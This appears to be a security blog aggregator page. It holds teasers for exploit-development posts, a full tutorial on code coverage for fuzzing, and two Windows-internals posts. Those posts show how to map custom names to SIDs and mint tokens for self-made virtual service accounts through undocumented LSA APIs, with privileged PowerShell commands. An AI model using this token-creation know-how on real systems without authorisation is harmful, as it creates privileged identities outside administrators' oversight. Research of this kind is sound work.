
Work Items & System Worker Threads - 'Practical Reverse Engineering' solutions - Part 3

10 March 2021 at 00:00
Introduction This post is about ‘Work Items’, the third part of my ‘Practical Reverse Engineering’ solutions series and a natural continuation to the previous one about kernel system threads. Luckily, thanks to Alex Ionescu, while researching the topic, I had the chance to get a pre-proof copy of Windows Internals 7th edition, Part 2 ahead of time so I could check my initial findings against the ones from the authors of the book.

Windows 10 egghunter (wow64) and more

Introduction Ok, I have a confession to make, I have always been somewhat intrigued by egghunters. That doesn’t mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it’s a good practice to try to avoid egghunters if you can, as they tend to […]

The post Windows 10 egghunter (wow64) and more first appeared on Corelan Cybersecurity Research.

Windows 10 x86/wow64 Userland heap

Introduction Hi all, Over the course of the past few weeks, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked".  I quickly realized that their computers got upgraded to Windows 10. We […]

The post Windows 10 x86/wow64 Userland heap first appeared on Corelan Cybersecurity Research.

EncFSGui – GUI Wrapper around encfs for OSX

Introduction 3 weeks ago, I posted a rant about my frustration/concern related to crypto tools, more specifically the lack of tools to implement crypto-based protection for files on OSX in a point-&-click, user-friendly way.  I listed my personal functional and technical criteria for such tools and came to the conclusion that the industry seems to […]

The post EncFSGui – GUI Wrapper around encfs for OSX first appeared on Corelan Cybersecurity Research.

Crypto in the box, stone age edition

Introduction First of all, Happy New Year to everyone! I hope 2016 will be a fantastic and healthy year, filled with fun, joy, energy, and lots of pleasant surprises. I remember when all of my data would fit on a single floppy disk. 10 times. The first laptops looked like (and felt like) mainframes on […]

The post Crypto in the box, stone age edition first appeared on Corelan Cybersecurity Research.

How to become a pentester

Intro I receive a lot of emails.  (Please don’t make it worse, thanks!)   Unfortunately I don’t have as much spare time as I used to, or would like to, so I often have no other choice than to redirect questions to our forums or our IRC channel (#corelan on freenode), hoping that other members […]

The post How to become a pentester first appeared on Corelan Cybersecurity Research.

Analyzing heap objects with mona.py

Introduction Hi all, While preparing for my Advanced exploit dev course at Derbycon, I’ve been playing with heap allocation primitives in IE.  One of the things that causes some frustration (or, at least, tends to slow me down during the research) is the ability to quickly identify objects that may be useful. After all, I’m […]

The post Analyzing heap objects with mona.py first appeared on Corelan Cybersecurity Research.

CSO : Common Sense Operator/Operations

As the CSO/CISO/person responsible for Information Security, your job is to…  well … do you even know?  Does upper management know?  "Our crappy CSO …" and "Our stupid CSO …" are statements commonly used by various (techie) people, throwing their hands up in despair, attempting to prove that their CSO doesn’t understand technology and has […]

The post CSO : Common Sense Operator/Operations first appeared on Corelan Cybersecurity Research.

HITB2014AMS – Day 2 – On Her Majesty’s Secret Service: GRX & A Spy Agency

Last year, Belgacom got hacked by an intelligence service (GCHQ?), Rob says. “What is so interesting about this hack, why did they hack into Belgacom, what would or could be the purpose of a similar hack?”  Before answering those questions, we need to take a quick look at how mobile networks work and how mobile […]

The post HITB2014AMS – Day 2 – On Her Majesty’s Secret Service: GRX & A Spy Agency first appeared on Corelan Cybersecurity Research.

HITB2014AMS – Day 2 – Exploring and Exploiting iOS Web Browsers

iOS Browsers & UIWebview iOS is very popular (according to StatCounter, it’s the 3rd most popular platform used).  Mobile browsers take about 20% to 25% of the market share. iOS offers integration with desktop browsers and the cloud (so the same data is available to an attacker).  Many 3rd-party iOS browsers have similar weaknesses which […]

The post HITB2014AMS – Day 2 – Exploring and Exploiting iOS Web Browsers first appeared on Corelan Cybersecurity Research.

HITB2014AMS – Day 2 – Keynote 4: Hack It Forward

Good morning Amsterdam, good morning readers, welcome to the second day of the Hack In The Box conference. The speaker for the first keynote didn’t show up,  so we’ll jump right into the next keynote. Jennifer starts her keynote by explaining that she’s fortunate to be able to travel to a lot of conferences and […]

The post HITB2014AMS – Day 2 – Keynote 4: Hack It Forward first appeared on Corelan Cybersecurity Research.

System Threads and their elusiveness. 'Practical Reverse Engineering' solutions - Part 2

11 February 2021 at 00:00
Introduction In this second blog post about Practical Reverse Engineering solutions I’d like to focus on the following exercise on Page 128. This one is the first related to Asynchronous and Ad-Hoc Execution kernel objects, and specifically on how System Threads are invoked via the PsCreateSystemThread routine. Here is the original exercise statement: After reading some online forums, you notice some people suggesting that PsCreateSystemThread will create a thread in the context of the calling process.

Linked List in the Kernel: 'Practical Reverse Engineering' solutions - Part 1

1 January 2021 at 00:00
Introduction Lately, I dusted off the marvelous ‘Practical Reverse Engineering’ book by Bruce Dang & Co., which made me realize it would be useful to structure notes along each chapter’s exercises. Could be a valuable reference for the future, especially anything related to Chapter 3 (Windows Kernel) onwards. I decided to focus on one of the most basic and still very widespread data structures in kernel land: linked lists.

Fuzzing Like A Caveman 5: A Code Coverage Tour for Cavepeople

By: h0mbre
16 January 2021 at 05:00

Introduction

We’ve already discussed the importance of code coverage previously in this series so today we’ll try to understand some of the very basic underlying concepts, some common approaches, some tooling, and also see what techniques some popular fuzzing frameworks are capable of leveraging. We’re going to shy away from some of the more esoteric strategies and try to focus on what would be called the ‘bread and butter’, well-trodden subject areas. So if you’re new to fuzzing, new to software testing, this blogpost should be friendly. I’ve found that a lot of the terminology used in this space is intuitive and easy to understand, but there are some outliers. Hopefully this helps you at least get on your way doing your own research.

We will do our best to not get bogged down in definitional minutiae, and instead will focus on just learning stuff. I’m not a computer scientist and the point of this blogpost is to merely introduce you to these concepts so that you can understand their utility in fuzzing. In that spirit, if you find any information that is misleading or egregiously incorrect, please let me know.

Thanks to all that have been so charitable on Twitter answering questions and helping me out along the way, people like: @gamozolabs, @domenuk, @is_eqv, @d0c_s4vage, and @naehrdine just to name a few :)

Core Definitions

One of the first things we need to do is get some definitions out of the way. These definitions will be important as we will build upon them in the subsequent explanations/explorations.

Code Coverage

Code coverage is any metric that gives you insight into how much of a program’s code has been reached by a test, input, etc. We won’t spend a lot of time here as we’ve already discussed code coverage in previous posts. Code coverage is very important to fuzzing as it allows you to keep track of how much surface area in the target program you are able to reach. You can imagine that if you only explore a small % of the program space, your testing might be limited in comprehensiveness.

Basic Blocks

Let’s get the Wikipedia definition out of the way first:

“In compiler construction, a basic block is a straight-line code sequence with no branches in except to the entry and no branches out except at the exit.”

So a ‘basic block’ is a code sequence that is executed linearly where there is no opportunity for the code execution path to branch into separate directions. Let’s come up with a visual example. Take the following dummy program that gets a password via the command line and then checks that it meets password length requirements:

#include <stdio.h>
#include <stdlib.h>

int length_check(char* password)
{
    long i = 0;
    while (password[i] != '\0')
    {
        i++;
    }

    if (i < 8 || i > 20)
    {
        return 0;
    }

    return 1;
}

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("usage: ./passcheck <password>\n");
        printf("usage: ./passcheck mysecretpassword2021\n");
        exit(-1);
    }

    int result = length_check(argv[1]);

    if (!result)
    {
        printf("password does not meet length requirements\n");
        exit(-1);
    }

    else
    {
        printf("password meets length requirements\n");
    }
}

Once we get this compiled and analyzed in Ghidra, we can see the following graph view of main():

‘Blocks’ is one of those intuitive terms; we can see how the graph view automatically breaks down main() into blocks of code. If you look inside each block, you will see that code execution is unidirectional: there are no opportunities inside of a block to take two or more different paths. The code execution is on rails and the train track has no forks. You can see that blocks terminate in this example with conditional jumps (JZ, JNZ), main returning, and function calls to exit.

Edges/Branches/Transitions

‘Edge’ is one of those terms in CS/graph theory that I don’t think is super intuitive and I much prefer ‘Transition’ or ‘Branch’, but essentially this is meant to capture relationships between basic blocks. Looking back at our basic block graph from Ghidra, we can see that a few different relationships exist, that is to say that there are multiple pathways code execution can take depending on a few conditions.

Basic block 001006cf has a relationship with two different blocks: 001006e4 and 00100706. So code execution inside of 001006cf can reach either of the two blocks it has a relationship with depending on a condition. That condition in our case is the JZ operation depending on whether or not the number of command line arguments is 2:

  • if the number of arguments is not 2, we branch to block 001006e4 organically by just not taking the conditional jump (JZ)
  • if the number of arguments is 2, we branch to block 00100706 by taking the conditional jump

These two possibilities can be referred to as ‘Edges’, so block 001006cf has two edges. You can imagine how this might be important from the perspective of fuzzing. If our fuzzer is only ever exploring one of a basic block’s edges, we are leaving an entire branch untested, so it would behoove us to track this type of information.

There’s apparently much more to this concept than I let on here, you can read more on the Wikipedia entry for Control-flow_graph.

Paths

‘Path’ is just the list of basic blocks our program execution traversed. Looking at our example program, there are a few different paths, as illustrated below with the orange, green and red lines.

Path One: 0x001006cf -> 0x001006e4

Path Two: 0x001006cf -> 0x00100706 -> 0x00100738

Path Three: 0x001006cf -> 0x00100706 -> 0x00100722

Instrumentation

In this blogpost, “Instrumentation” will refer to the process of equipping your fuzzing target with the ability to provide code coverage feedback data. This could mean lots of things. It could be as complex as completely rewriting a compiled binary blob that we have no source code for or as simple as placing a breakpoint on the address of every basic block entry address.

One of the important aspects of instrumentation to keep in mind is the performance penalty it incurs. If your instrumentation provides 50% more useful information than a cheaper technique but runs 1000x slower, you have to consider the tradeoffs. The extra data might very well be worth the huge performance penalty; it just depends.

Binary Only

This is a simple one, “Binary Only” refers to targets that we don’t have source code for. So all we have to work with is a binary blob. It can be dynamically or statically linked. These types of targets are more prevalent in certain environments, think embedded targets, MacOS, and Windows. There are still binary-only targets on Linux though, they’re just less common.

Even though “binary only” is simple to understand, the implications for gathering code coverage data are far-reaching. A lot of popular code coverage mechanisms rely upon having source code so that the target can be compiled in a certain way that lends itself well to gathering coverage data, for binary-only targets we don’t have the luxury of compiling the target the way that we want. We have to deal with the compiled target the way it is.

Common Strategies

In this section we’ll start looking at common strategies fuzzing tools utilize to gather code coverage data.

Tracking Basic Blocks

One of the simplest ways to gather code coverage is to track how many basic blocks are reached by a given input. You can imagine that we are exploring a target program with our inputs and we want to know what code has been reached. Well, we know from our definition of basic blocks above that if we enter a basic block we will execute all of the code within, so if we just track whether or not a basic block has been reached, we will at least know what blocks we have not yet hit and we can go manually inspect them.

This approach isn’t very sophisticated and kind of offers little in the way of high-fidelity coverage data; however, it is extremely simple to implement and works with all kinds of targets. Don’t have source? Throw some breakpoints on it. Don’t have time to write compiler code? Throw some breakpoints on it.

Performance wise, this technique is great. Hitting new coverage will entail hitting a breakpoint, removing the breakpoint and restoring the original contents that were overwritten during instrumentation, saving the input that reached the breakpoint, and continuing on. These events will actually be slow when they occur; however, as you progress through your fuzzing campaign, new coverage becomes increasingly rare. So there is an upfront cost that eventually decreases to near-zero as time goes by.

I’d say that in my limited experience, this type of coverage is typically employed against closed-source targets (binary-only) where our options are limited and this low-tech method works well enough.
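To make the bookkeeping concrete, here is a minimal sketch of what breakpoint-based block coverage might look like. This is an illustration only, not any particular tool's implementation, and read_byte/write_byte are stand-ins for whatever debugger primitives your target allows:

#include <cstdint>
#include <unordered_map>
#include <unordered_set>
#include <vector>

// Provided by whatever debugger layer you're driving the target with;
// these are placeholders, not a real API.
uint8_t read_byte(uint64_t addr);
void write_byte(uint64_t addr, uint8_t value);

struct BlockCoverage {
    std::unordered_map<uint64_t, uint8_t> original_bytes; // addr -> saved byte
    std::unordered_set<uint64_t> hit_blocks;              // coverage so far

    // Arm every known basic block entry with a software breakpoint (0xCC).
    void arm(const std::vector<uint64_t>& block_entries) {
        for (uint64_t addr : block_entries) {
            original_bytes[addr] = read_byte(addr);
            write_byte(addr, 0xCC); // int3
        }
    }

    // Called when the debugger reports a breakpoint at addr: record the
    // new coverage and restore the original byte so this block runs at
    // full speed from now on; the caller saves the input that got here.
    void on_breakpoint(uint64_t addr) {
        hit_blocks.insert(addr);
        write_byte(addr, original_bytes[addr]);
    }
};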

Let’s check out @gamozolabs’ really fast basic block tracking coverage tool called Mesos. You can see that it is aimed at use on Windows, where most targets will be binary-only. The neat thing about this tool is its performance. You can see his benchmark results in the README:

Registered    1000000 breakpoints in   0.162230 seconds |  6164072.8 / second
Applied       1000000 breakpoints in   0.321347 seconds |  3111897.0 / second
Cleared       1000000 breakpoints in   0.067024 seconds | 14920028.6 / second
Hit            100000 breakpoints in  10.066440 seconds |     9934.0 / second

One thing to keep in mind is that if you use this way of collecting coverage data, you might limit yourself to the first input that reaches a basic block. Say for instance we have the following code:

// input here is an unsigned char buff
if (input[0x9] < 220)
{
    parsing_routine_1(input);
}

else
{
    parsing_routine_2(input);
}

If our first input to reach this code has a value of 200 inside of input[0x9], then we will progress to the parsing_routine_1 block entry. We will remove our breakpoint at the entry of parsing_routine_1 and we will add the input that reached it to our corpus. But now that we’ve reached our block with an input that had a value of 200, we’re kind of married to that value as we will never hit this breakpoint again with any of the other values that would’ve reached it as well. So we’ll never save an input to the corpus that “solved” this basic block a different way. This can be important. Let’s say parsing_routine_1 then takes the entire input, and reads through the input byte-by-byte for the entirety of the input’s length and does some sort of lengthy parsing at each iteration. And let’s also say there are no subsequent routines that are highly stateful where large inputs vary drastically from smaller inputs in behavior. What if the first input we gave the program that solved this block was 1MB in size? Our fuzzers are kind of married to the large input we saved in the corpus, and we were kind of unlucky that a shorter input didn’t solve this block first; this could hurt performance.

One way to overcome this problem would be to just simply re-instantiate all of your breakpoints periodically. Say you have been running your fuzzer for 10 billion fuzz-cases and haven’t found any new coverage in 24 hours: you could at that point insert all of your already discovered breakpoints once again and try to solve the blocks in a different way, perhaps saving a smaller, more performant input that solved the block with, say, input[0x9] = 20. Really, there are a million different ways to solve this problem. I believe @gamozolabs addressed this exact issue before on Twitter but I wasn’t able to find the post.

All in all, this is a really effective coverage method especially given the variety of targets it works for and how simple it is to implement.

Tracking Edges and Paths

Tracking edges is very popular because this is the strategy employed by AFL and its children. This is the approach where we not only care about what basic blocks are being hit but also, what relationships are being explored between basic blocks.

The AFL++ stats output has references to both paths and edges and implicitly ‘counters’. I’m not 100% sure but I believe their definition of a ‘path’ matches up to ours above. I think they are saying that a ‘path’ is the same as a testcase in their documentation.

I won’t get too in-depth here analyzing how AFL and its children (really AFL++ is quite different than AFL) collect and analyze coverage for a simple reason: it’s for big brain people and I don’t understand much of it. If you’re interested in a more detailed breakdown, head on over to their docs and have a blast.

To track edges, AFL uses tuples of the block addresses involved in the relationship. So in our example program, if we went from block 0x001006cf to block 0x001006e4 because we didn’t provide the correct number of command line arguments, this tuple (0x001006cf, 0x001006e4) would be added to a coverage map AFL++ uses to track unique paths. So let’s track the tuples we would register if we traversed an entire path in our program:

0x001006cf -> 0x00100706 -> 0x00100722

If we take the above path, we can formulate two tuples of coverage data: (0x001006cf, 0x00100706) and (0x00100706, 0x00100722). These can be looked up in AFL’s coverage data to see if these relationships have been explored before.

Not only does AFL track these relationships, it also tracks frequency. So for instance, it is aware of how often each particular edge is reached and explored.
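The edge-folding trick AFL's technical whitepaper describes is compact enough to sketch here. Roughly (this is a paraphrase of the documented scheme, not AFL's literal source), each basic block gets a compile-time random ID, and every edge is hashed into a byte map whose entries double as hit counters:

#include <cstddef>
#include <cstdint>

constexpr size_t MAP_SIZE = 1 << 16;   // AFL's default 64KB coverage map
uint8_t shared_mem[MAP_SIZE];          // shared with the fuzzer process
uint16_t prev_location;                // ID of the block we came from

// Conceptually injected at the entry of every instrumented basic block,
// where cur_location is that block's compile-time random ID.
inline void log_edge(uint16_t cur_location) {
    shared_mem[(cur_location ^ prev_location) % MAP_SIZE]++; // edge hit count
    prev_location = cur_location >> 1; // shift so that A->B != B->A
}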

This kind of coverage data is way more complex than merely tracking basic blocks reached; however, getting this level of detail is also not nearly as straightforward.

In the most common case, AFL gets this data by using compile-time instrumentation on the target. You can compile your target (that you have source code for) using the AFL compiler, which will emit compiled code with the instrumentation embedded in the target. This is extremely nifty. But it requires access to source code, which isn’t always possible.

AFL has an answer for binary-only targets as well and leverages the powerful QEMU emulator to gather similarly detailed coverage data. Emulators have relatively free access to this type of data since they have to take the target instructions and either interpret them (which means simulate their execution) or JIT (just-in-time) compile the blocks into native code and execute them natively. In the case of QEMU here, blocks are JIT’d into native code and stored in a cache so that it could be easily used again by subsequent executions. So when QEMU comes upon a basic block, it can check whether or not this block has been compiled or not already and act accordingly. AFL utilizes this process to track what blocks are being executed and gets very similar data to what it gathers with compile time instrumentation.

I don’t understand all of the nuance here, but a great blogpost to read on the subject is @abiondo’s post explaining an optimization they made to AFL QEMU mode in 2018. In a grossly short (hopefully not too inaccurate) summary, QEMU would pre-compute what are called direct jumps and compile those blocks essentially into a single block (via keeping execution in natively compiled blocks) as a way to speed things up. Take this toy example for instance:

ADD RAX, 0x8
JMP LAB_0x00100738

Here we have a pre-computable destination to our jump. We know the relative offset to LAB_0x00100738 from our current address (absolute value of current_addr - LAB_0x00100738), so in an emulator we could just take that jump and replace the destination with the compiled block of LAB_0x00100738, and no calculations would need to take place during each execution (only the initial one to calculate the relative offset). This would allow the emulator to progress with native execution without going back into what I would call a ‘simulation-mode’ where it has to calculate the address before jumping to it each time it’s executed. This is called “block-chaining” in QEMU. Well, you can imagine that if this occurs, that huge block of natively executed code (that is really two blocks) is completely opaque to AFL, as it’s unaware that two blocks are contained within, and so it cannot log the edge that was taken. So as a workaround, AFL would patch QEMU to no longer do this block-chaining and keep every block isolated so that edges could be tracked. This would mean that at the end of every block, direct jump or not, QEMU would go back into that ‘simulation-mode’, which would incur a performance penalty.
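To picture why chaining hides edges, here is a toy model (my own sketch, not QEMU's actual code) of an emulator dispatch loop. The log_edge call can only happen when execution returns to this loop between blocks; block-chaining keeps execution inside the JIT'd code, so chained edges never pass through here:

#include <cstdint>
#include <unordered_map>

// A JIT'd guest block: running it returns the guest address of the
// next block to execute.
struct Block { uint64_t (*native_code)(); };

std::unordered_map<uint64_t, Block*> block_cache; // compiled-block cache
Block* compile_block(uint64_t guest_pc);          // JIT compiler (placeholder)
void log_edge(uint64_t prev, uint64_t cur);       // coverage hook (placeholder)

void dispatch_loop(uint64_t pc) {
    uint64_t prev = 0;
    for (;;) {
        Block*& block = block_cache[pc];
        if (!block) block = compile_block(pc); // compile on first sight
        log_edge(prev, pc);                    // only reachable w/o chaining
        prev = pc;
        pc = block->native_code();             // run natively to block end
    }
}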

Definitely read through @abiondo’s blogpost though, it’s much more informative.

If you’re wondering what an indirect jump would be, it would be something where the jump location is only known at execution time, something that could look like this in a toy example:

ADD RAX, 0x8
JMP RAX

The only issue with using QEMU to gather our coverage data is that it is relatively slow compared to purely native execution. This slowdown can be worth it obviously, as the amount of data you get is substantial, and sometimes with binary-only targets there are no other alternatives.

Compare Coverage/Compare Shattering

Instead of merely tracking an input or test’s progress through a program’s blocks/edges, compare coverage seeks to understand how much progress our test is making through the program’s comparisons. Comparisons can be done in different ways, but a common one already exists in our example password program. In the 001006cf block, we have a CMP operation being performed here:

CMP dword ptr [RBP + local_1c], 0x2

A dword is a 4 byte value (32 bits) and this operation is taking our argc value in our program and comparing it with 0x2 to check how many command line arguments were provided. So our two comparison operands are whatever is on the stack at the offset RBP + local_1c and 0x2. If these operands are equal, the Zero Flag will be set and we can utilize a conditional jump with JZ to move accordingly in the program.

But the problem, as it relates to fuzzing, is that this comparison is rather binary. It either sets the Zero Flag or it does not, there is no nuance. We cannot tell how close we came to passing the comparison, to setting the Zero Flag.

So for example, let’s say we were doing a comparison with 0xdeadbeef instead of 0x2. In that case, if we were to submit 0xdeadbebe for the other operand, we’d be much closer to satisfying the JZ condition than we would be if we submitted 0x0.

At a high-level, compare coverage breaks this comparison down into chunks so that progress through the comparison can be tracked with much more granularity than a binary PASS/FAIL. So using compare coverage, this comparison might instead be rewritten as follows:

BEFORE:

Does 0xdeadbebe == 0xdeadbeef ?

AFTER:

Does 0xde == 0xde ? If so, log that we’ve matched the first byte, and

does 0xad == 0xad ? If so, log that we’ve matched the second byte, and

does 0xbe == 0xbe ? If so, log that we’ve matched the third byte, and

does 0xbe == 0xef ? If so, log that we’ve matched both operands completely.

In our AFTER rewrite, instead of getting a binary PASS/FAIL, we instead see that we progressed 75% of the way through the comparison matching 3 out of 4 bytes. Now we know that we can save this input and mutate it further hoping that we can pass the final byte comparison with a correct mutation.

Here we took a 4 byte comparison and broke it down into 4 separate single-byte comparisons. This is also known as “Compare Shattering”. In spirit, it’s very similar to compare coverage. It’s all about breaking down large comparisons into smaller chunks so that progress can be tracked with more fidelity.

We also aren’t restricted to only breaking down each comparison to bytes, we could instead compare the two operands at the bit-level. For instance we could’ve also compared them as follows:

1101 1110 1010 1101 1011 1110 1110 1111 vs

1101 1110 1010 1101 1011 1110 1011 1110

This could be broken down into 32 separate comparisons instead of our 4, giving us even more fidelity and progress tracking (probably at the expense of performance in practice).
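As a toy illustration of the idea (my own sketch, not any particular fuzzer's implementation), a shattered 4-byte comparison amounts to reporting how many operand bytes matched rather than a single PASS/FAIL:

#include <cstdint>

// Returns 0..4: how many bytes of the comparison matched, starting from
// the most significant byte. E.g. 0xdeadbebe vs 0xdeadbeef returns 3,
// i.e. 75% progress through the comparison.
int matching_bytes(uint32_t lhs, uint32_t rhs) {
    int matched = 0;
    for (int shift = 24; shift >= 0; shift -= 8) {
        if (((lhs >> shift) & 0xff) != ((rhs >> shift) & 0xff))
            break;
        matched++; // one more byte of progress
    }
    return matched;
}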

Some fuzzers take all compare operands, like 0xdeadbeef in this example, and add them to a sort of magic values dictionary that the fuzzer will randomly insert into its inputs hoping to pass the comparison in the future.

You can imagine a scenario where a program checks a large value before branching to a complex routine that needs to be explored. Passing these checks is extremely difficult with just basic coverage and would require a lot of human interaction. One could examine a colored graph in IDA that displayed reached blocks and try to manually figure out what was preventing the fuzzer from reaching unreached blocks and determine that a large 32 byte comparison was being failed. One could then adjust their fuzzer to account for this comparison by means of a dictionary or whatever, but this process is all very manual.

There are some really interesting/highly technical means to do this type of thing to both targets with source and binary-only targets!

AFL++ features an LLVM mode where you can utilize what they call “laf-intel instrumentation” which is described here and originally written about here. Straight from laf-intel’s blogpost, we can see their example looks extremely similar to the thought experiment we already went through where they have this source code:

if (input == 0xabad1dea) {
  /* terribly buggy code */
} else {
  /* secure code */
}

And this code snippet is ‘de-optimized’ into several smaller comparisons that the fuzzer can measure its progress through:

if (input >> 24 == 0xab){
  if ((input & 0xff0000) >> 16 == 0xad) {
    if ((input & 0xff00) >> 8 == 0x1d) {
      if ((input & 0xff) == 0xea) {
        /* terrible code */
        goto end;
      }
    }
  }
}

/* good code */

end:

This de-optimized code can be emitted when one opts to specify certain environment variables and utilizes afl-clang-fast to compile the target.

This is super clever and can really take tons of manual effort out of fuzzing.

But what are we to do when we don’t have access to source code and our binary-only target is possibly full of large comparisons?

Luckily, there are open-source solutions to this problem as well. Let’s look at one called “TinyInst” by @ifsecure and friends. I can’t get deep into how this tool works technically because I’ve never used it but the README is pretty descriptive!

As we can see, it is aimed at MacOS and Windows targets, in keeping with its purpose of instrumenting binary-only targets. TinyInst gets us coverage by instrumenting select routines via debugger to change the execution permissions so that any execution (not read or write, as these permissions are maintained) access to our instrumented code results in a fault, which is then handled by the TinyInst debugger, where code execution is redirected to a re-written, instrumented routine/module. So TinyInst blocks all execution of the original module and instead redirects all that execution to a rewritten module that is inserted into the program. You can see how powerful this can be as it can allow for the breaking down of large comparisons into much smaller ones in a manner very similar to the laf-intel method, but for a target that is already compiled. Look at this cool gif showing compare coverage in action from @ifsecure: [https://twitter.com/ifsecure/status/1298341219614031873?s=20]. You can see that he has a program that checks for an 8 byte value, and his fuzzer makes incremental progress through it until it has solved the comparison.

There are some other tools out there that work similarly in theory to TinyInst and are definitely worth looking at; they are also mentioned in the README: tools like DynamoRIO and PIN.

It should be mentioned that AFL++ also has the ability to do compare coverage tracking even in QEMU mode.

Bonus Land: Using Hardware to Get Coverage Data

That pretty much wraps up the very basics of what type of data we’re interested in, why, and how we might be able to extract it. One type of data extraction method that didn’t come up yet that is particularly helpful for binary-only targets is utilizing your actual hardware to get coverage data.

While it’s not really a ‘strategy’ as the others were, it enables the execution of the strategies mentioned above and wasn’t mentioned yet. We won’t get too deep here. Nowadays, CPUs come chock-full of all kinds of utilities that are aimed at high-fidelity performance profiling. These types of utilities can also be wrangled into giving us coverage data.

Intel-PT is a utility offered by newer Intel CPUs that allows you to extract information about the software you’re running such as control-flow. Each hardware thread has the ability to store data about the application it is executing. The big hang up with using processor trace is that decoding the trace data that is collected has always been painfully slow and cumbersome to work with. Recently however, @is_eqv and @ms_s3c were able to create a very performant library called libxdc which can be used to decode Intel-PT trace data performantly. The graph included in their README is very cool, you can see how much faster it is than the other hardware-sourced coverage guided fuzzing tools while also collecting the highest-fidelity coverage data, what they call “Full Edge Coverage”. Getting your coverage data straight from the CPU seems ideal haha. So for them to be able to engineer a library that gives you what is essentially perfect coverage, and by the way, doesn’t require source code, seems like a substantial accomplishment. I personally don’t have the engineering chops to deal with this type of coverage at the moment, but one day. A lot of popular fuzzers can utilize Intel-PT right out of the box, fuzzers like: AFL++, honggfuzz, and WinAFL.

There are many other such utilities but they are beyond the scope of this introductory blogpost.

Conclusion

In this post we went over some of the building-block terminology used in the space, some very common fundamental strategies that are employed to get meaningful coverage data, and also some of the tooling that is used to extract the data (and in some cases what fuzzing frameworks use what tooling). It should be mentioned that the popular fuzzing frameworks like AFL++ and honggfuzz go to great lengths to make their frameworks as flexible as possible and work with a wide breadth of targets. They often give you tons of flexibility to employ the coverage data extraction method that’s best suited to your situation. Hopefully this was somewhat helpful to begin to understand some of the problems associated with code coverage as it relates to fuzzing.

Linked List in the Kernel - 'Practical Reverse Engineering' solutions - Chapter 3 - Part 1

1 December 2020 at 00:00
Introduction Going once again through the ‘Practical Reverse Engineering’ book by Bruce Dang & Co. made me realize it would be useful to structure notes together with the chapter’s exercises, as it might be valuable as a future reference, especially anything related to Chapter 3 (Windows Kernel) onwards. This one is focusing on one of the most basic and yet most widespread data structures in kernel land: linked lists. The most used list type in the Windows Kernel is the circular doubly-linked list, so we are going to focus only on this kind.

Creating your own Virtual Service Accounts

By: tiraniddo
26 October 2020 at 23:54

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer, what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts.

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured, which makes such accounts ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down, or specifying a domain user with a password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.
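As a quick sketch of that restriction (my own illustrative helper built on documented Win32 SID APIs, not anything from LSASS), a check for whether a SID is even a candidate in that range could look like:

#include <windows.h>
#include <cstring>

// Does this SID use the NT security authority (5) with a first RID in
// the 80-111 range that virtual service accounts require?
bool IsVirtualAccountCandidate(PSID sid) {
    static const SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY; // {0,0,0,0,0,5}
    PSID_IDENTIFIER_AUTHORITY auth = GetSidIdentifierAuthority(sid);
    if (std::memcmp(auth, &nt, sizeof(nt)) != 0)
        return false;                       // not the NT authority
    if (*GetSidSubAuthorityCount(sid) < 1)
        return false;                       // no RIDs at all
    DWORD firstRid = *GetSidSubAuthority(sid, 0);
    return firstRid >= 80 && firstRid <= 111;
}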

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create our own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now, before you can log the account on, you need to grant it a logon right. This is normally SeServiceLogonRight if you want a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually log in with your virtual account, at least easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose an interactive logon type, the token will also have the INTERACTIVE group assigned. Anyway, that's all for now. I guess, as there's only a limited number of RIDs available (which is an artificial restriction), MS doesn't want to document these features even though they could be useful for normal developers.



Using LsaManageSidNameMapping to add a name to a SID.

By: tiraniddo
24 October 2020 at 23:23

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly, while you can add some SID-to-name mappings, this API won't let you do that for capability SIDs, as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
